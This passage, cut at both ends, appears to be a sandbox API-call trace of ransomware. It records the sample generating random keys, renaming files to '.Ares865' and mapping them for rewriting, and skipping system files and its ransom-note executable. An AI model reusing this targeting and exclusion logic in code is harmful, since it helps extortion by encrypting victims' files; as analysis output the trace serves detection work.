phProv=0x2ccce54*=0x2f0518) returned 1 [0133.219] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.219] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.219] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x850, lpName=0x0) returned 0x170 [0133.220] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x850) returned 0x190000 [0133.221] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.222] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.222] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.223] lstrcpyW (in: lpString1=0x2cce460, lpString2="Chatham" | out: lpString1="Chatham") returned="Chatham" [0133.223] lstrlenW (lpString="Chatham") returned 7 [0133.223] lstrlenW (lpString="Ares865") returned 7 [0133.223] lstrlenW (lpString=".dll") returned 4 [0133.223] lstrcmpiW (lpString1="Chatham", lpString2=".dll") returned 1 [0133.223] lstrlenW (lpString=".lnk") returned 4 [0133.223] lstrcmpiW (lpString1="Chatham", lpString2=".lnk") returned 1 [0133.223] lstrlenW (lpString=".ini") returned 4 [0133.223] lstrcmpiW (lpString1="Chatham", lpString2=".ini") returned 1 [0133.223] lstrlenW (lpString=".sys") returned 4 [0133.223] lstrcmpiW (lpString1="Chatham", lpString2=".sys") returned 1 [0133.223] lstrlenW (lpString="Chatham") returned 7 [0133.223] lstrlenW (lpString="bak") returned 3 [0133.223] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Chatham.Ares865") returned 63 [0133.223] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Chatham" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\chatham"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Chatham.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\chatham.ares865"), dwFlags=0x1) returned 1 [0133.224] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Chatham.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\chatham.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.225] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1124) returned 1 [0133.225] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.225] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.226] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.226] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x770, lpName=0x0) returned 0x170 [0133.227] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x770) returned 0x190000 [0133.228] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.229] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.229] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.229] lstrcpyW (in: lpString1=0x2cce460, lpString2="Chuuk" | out: lpString1="Chuuk") returned="Chuuk" [0133.229] lstrlenW (lpString="Chuuk") returned 5 [0133.229] lstrlenW (lpString="Ares865") returned 7 [0133.229] lstrlenW (lpString=".dll") returned 4 [0133.229] lstrcmpiW (lpString1="Chuuk", lpString2=".dll") returned 1 [0133.229] lstrlenW (lpString=".lnk") returned 4 [0133.229] lstrcmpiW (lpString1="Chuuk", lpString2=".lnk") returned 1 [0133.229] lstrlenW (lpString=".ini") returned 4 [0133.230] lstrcmpiW (lpString1="Chuuk", lpString2=".ini") returned 1 [0133.230] lstrlenW (lpString=".sys") returned 4 [0133.230] lstrcmpiW (lpString1="Chuuk", lpString2=".sys") returned 1 [0133.230] lstrlenW (lpString="Chuuk") returned 5 [0133.230] lstrlenW (lpString="bak") returned 3 [0133.230] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Chuuk.Ares865") returned 61 [0133.230] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Chuuk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\chuuk"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Chuuk.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\chuuk.ares865"), dwFlags=0x1) returned 1 [0133.231] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Chuuk.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\chuuk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.231] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0133.232] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.232] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.232] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.233] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x170 [0133.235] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0133.235] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.236] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.236] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.237] lstrcpyW (in: lpString1=0x2cce460, lpString2="Easter" | out: lpString1="Easter") returned="Easter" [0133.237] lstrlenW (lpString="Easter") returned 6 [0133.237] lstrlenW (lpString="Ares865") returned 7 [0133.237] lstrlenW (lpString=".dll") returned 4 [0133.237] lstrcmpiW (lpString1="Easter", lpString2=".dll") returned 1 [0133.237] lstrlenW (lpString=".lnk") returned 4 [0133.237] lstrcmpiW (lpString1="Easter", lpString2=".lnk") returned 1 [0133.237] lstrlenW (lpString=".ini") returned 4 [0133.237] lstrcmpiW (lpString1="Easter", lpString2=".ini") returned 1 [0133.237] lstrlenW (lpString=".sys") returned 4 [0133.237] lstrcmpiW (lpString1="Easter", lpString2=".sys") returned 1 [0133.237] lstrlenW (lpString="Easter") returned 6 [0133.237] lstrlenW (lpString="bak") returned 3 [0133.237] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Easter.Ares865") returned 62 [0133.237] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Easter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\easter"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Easter.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\easter.ares865"), dwFlags=0x1) returned 1 [0133.238] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Easter.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\easter.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.238] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1248) returned 1 [0133.239] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.239] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.239] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.240] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x170 [0133.241] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x190000 [0133.242] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.243] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.243] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.243] lstrcpyW (in: lpString1=0x2cce460, lpString2="Efate.Ares865" | out: lpString1="Efate.Ares865") returned="Efate.Ares865" [0133.243] lstrlenW (lpString="Efate.Ares865") returned 13 [0133.243] lstrlenW (lpString="Ares865") returned 7 [0133.243] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0133.243] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74685fa0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x74685fa0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x746ac100, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x59, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Enderbury", cAlternateFileName="ENDERB~1")) returned 1 [0133.243] lstrcmpiW (lpString1="Enderbury", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0133.243] lstrcmpiW (lpString1="Enderbury", lpString2="aoldtz.exe") returned 1 [0133.243] lstrcmpiW (lpString1="Enderbury", lpString2=".") returned 1 [0133.244] lstrcmpiW (lpString1="Enderbury", lpString2="..") returned 1 [0133.244] lstrcmpiW (lpString1="Enderbury", lpString2="windows") returned -1 [0133.244] lstrcmpiW (lpString1="Enderbury", lpString2="bootmgr") returned 1 [0133.244] lstrcmpiW (lpString1="Enderbury", lpString2="temp") returned -1 [0133.244] lstrcmpiW (lpString1="Enderbury", lpString2="pagefile.sys") returned -1 [0133.244] lstrcmpiW (lpString1="Enderbury", lpString2="boot") returned 1 [0133.244] lstrcmpiW (lpString1="Enderbury", lpString2="ids.txt") returned -1 [0133.244] lstrcmpiW (lpString1="Enderbury", lpString2="ntuser.dat") returned -1 [0133.244] lstrcmpiW (lpString1="Enderbury", lpString2="perflogs") returned -1 [0133.244] lstrcmpiW (lpString1="Enderbury", lpString2="MSBuild") returned -1 [0133.244] lstrlenW (lpString="Enderbury") returned 9 [0133.244] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Efate.Ares865") returned 61 [0133.244] lstrcpyW (in: lpString1=0x2cce460, lpString2="Enderbury" | out: lpString1="Enderbury") returned="Enderbury" [0133.244] lstrlenW (lpString="Enderbury") returned 9 [0133.244] lstrlenW (lpString="Ares865") returned 7 [0133.244] lstrcmpiW (lpString1="derbury", lpString2="Ares865") returned 1 [0133.244] lstrlenW (lpString=".dll") returned 4 [0133.244] lstrcmpiW (lpString1="Enderbury", lpString2=".dll") returned 1 [0133.244] lstrlenW (lpString=".lnk") returned 4 [0133.244] lstrcmpiW (lpString1="Enderbury", lpString2=".lnk") returned 1 [0133.244] lstrlenW (lpString=".ini") returned 4 [0133.244] lstrcmpiW (lpString1="Enderbury", lpString2=".ini") returned 1 [0133.244] lstrlenW (lpString=".sys") returned 4 [0133.244] lstrcmpiW (lpString1="Enderbury", lpString2=".sys") returned 1 [0133.244] lstrlenW (lpString="Enderbury") returned 9 [0133.244] lstrlenW (lpString="bak") returned 3 [0133.244] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Enderbury.Ares865") returned 65 [0133.244] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Enderbury" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\enderbury"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Enderbury.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\enderbury.ares865"), dwFlags=0x1) returned 1 [0133.246] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Enderbury.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\enderbury.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.246] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=89) returned 1 [0133.246] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.247] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.247] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.247] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x360, lpName=0x0) returned 0x170 [0133.249] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x360) returned 0x190000 [0133.250] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.251] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.251] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.251] lstrcpyW (in: lpString1=0x2cce460, lpString2="Fakaofo" | out: lpString1="Fakaofo") returned="Fakaofo" [0133.251] lstrlenW (lpString="Fakaofo") returned 7 [0133.251] lstrlenW (lpString="Ares865") returned 7 [0133.251] lstrlenW (lpString=".dll") returned 4 [0133.251] lstrcmpiW (lpString1="Fakaofo", lpString2=".dll") returned 1 [0133.251] lstrlenW (lpString=".lnk") returned 4 [0133.251] lstrcmpiW (lpString1="Fakaofo", lpString2=".lnk") returned 1 [0133.251] lstrlenW (lpString=".ini") returned 4 [0133.251] lstrcmpiW (lpString1="Fakaofo", lpString2=".ini") returned 1 [0133.251] lstrlenW (lpString=".sys") returned 4 [0133.252] lstrcmpiW (lpString1="Fakaofo", lpString2=".sys") returned 1 [0133.252] lstrlenW (lpString="Fakaofo") returned 7 [0133.252] lstrlenW (lpString="bak") returned 3 [0133.252] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Fakaofo.Ares865") returned 63 [0133.252] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Fakaofo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\fakaofo"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Fakaofo.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\fakaofo.ares865"), dwFlags=0x1) returned 1 [0133.253] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Fakaofo.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\fakaofo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.253] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=77) returned 1 [0133.254] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.254] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.254] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.255] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x170 [0133.257] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0133.257] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.258] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.258] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.259] lstrcpyW (in: lpString1=0x2cce460, lpString2="Fiji" | out: lpString1="Fiji") returned="Fiji" [0133.259] lstrlenW (lpString="Fiji") returned 4 [0133.259] lstrlenW (lpString="Ares865") returned 7 [0133.259] lstrlenW (lpString=".dll") returned 4 [0133.259] lstrlenW (lpString=".lnk") returned 4 [0133.259] lstrlenW (lpString=".ini") returned 4 [0133.259] lstrlenW (lpString=".sys") returned 4 [0133.259] lstrlenW (lpString="Fiji") returned 4 [0133.259] lstrlenW (lpString="bak") returned 3 [0133.259] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Fiji.Ares865") returned 60 [0133.259] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Fiji" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\fiji"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Fiji.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\fiji.ares865"), dwFlags=0x1) returned 1 [0133.261] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Fiji.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\fiji.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.261] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=588) returned 1 [0133.261] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.262] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.262] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.262] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x550, lpName=0x0) returned 0x170 [0133.264] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x550) returned 0x190000 [0133.264] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.265] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.265] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.266] lstrcpyW (in: lpString1=0x2cce460, lpString2="Funafuti" | out: lpString1="Funafuti") returned="Funafuti" [0133.266] lstrlenW (lpString="Funafuti") returned 8 [0133.266] lstrlenW (lpString="Ares865") returned 7 [0133.266] lstrcmpiW (lpString1="unafuti", lpString2="Ares865") returned 1 [0133.266] lstrlenW (lpString=".dll") returned 4 [0133.266] lstrcmpiW (lpString1="Funafuti", lpString2=".dll") returned 1 [0133.266] lstrlenW (lpString=".lnk") returned 4 [0133.266] lstrcmpiW (lpString1="Funafuti", lpString2=".lnk") returned 1 [0133.266] lstrlenW (lpString=".ini") returned 4 [0133.266] lstrcmpiW (lpString1="Funafuti", lpString2=".ini") returned 1 [0133.266] lstrlenW (lpString=".sys") returned 4 [0133.266] lstrcmpiW (lpString1="Funafuti", lpString2=".sys") returned 1 [0133.266] lstrlenW (lpString="Funafuti") returned 8 [0133.266] lstrlenW (lpString="bak") returned 3 [0133.266] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Funafuti.Ares865") returned 64 [0133.266] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Funafuti" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\funafuti"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Funafuti.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\funafuti.ares865"), dwFlags=0x1) returned 1 [0133.268] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Funafuti.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\funafuti.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.268] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0133.268] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.269] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.269] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.269] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x170 [0133.271] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0133.271] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.272] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.272] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.273] lstrcpyW (in: lpString1=0x2cce460, lpString2="Galapagos" | out: lpString1="Galapagos") returned="Galapagos" [0133.273] lstrlenW (lpString="Galapagos") returned 9 [0133.273] lstrlenW (lpString="Ares865") returned 7 [0133.273] lstrcmpiW (lpString1="lapagos", lpString2="Ares865") returned 1 [0133.273] lstrlenW (lpString=".dll") returned 4 [0133.273] lstrcmpiW (lpString1="Galapagos", lpString2=".dll") returned 1 [0133.273] lstrlenW (lpString=".lnk") returned 4 [0133.273] lstrcmpiW (lpString1="Galapagos", lpString2=".lnk") returned 1 [0133.273] lstrlenW (lpString=".ini") returned 4 [0133.273] lstrcmpiW (lpString1="Galapagos", lpString2=".ini") returned 1 [0133.273] lstrlenW (lpString=".sys") returned 4 [0133.273] lstrcmpiW (lpString1="Galapagos", lpString2=".sys") returned 1 [0133.273] lstrlenW (lpString="Galapagos") returned 9 [0133.273] lstrlenW (lpString="bak") returned 3 [0133.273] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Galapagos.Ares865") returned 65 [0133.273] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Galapagos" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\galapagos"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Galapagos.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\galapagos.ares865"), dwFlags=0x1) returned 1 [0133.275] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Galapagos.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\galapagos.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.275] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=77) returned 1 [0133.275] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.276] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.276] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.276] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x170 [0133.278] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0133.279] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.279] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.279] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.280] 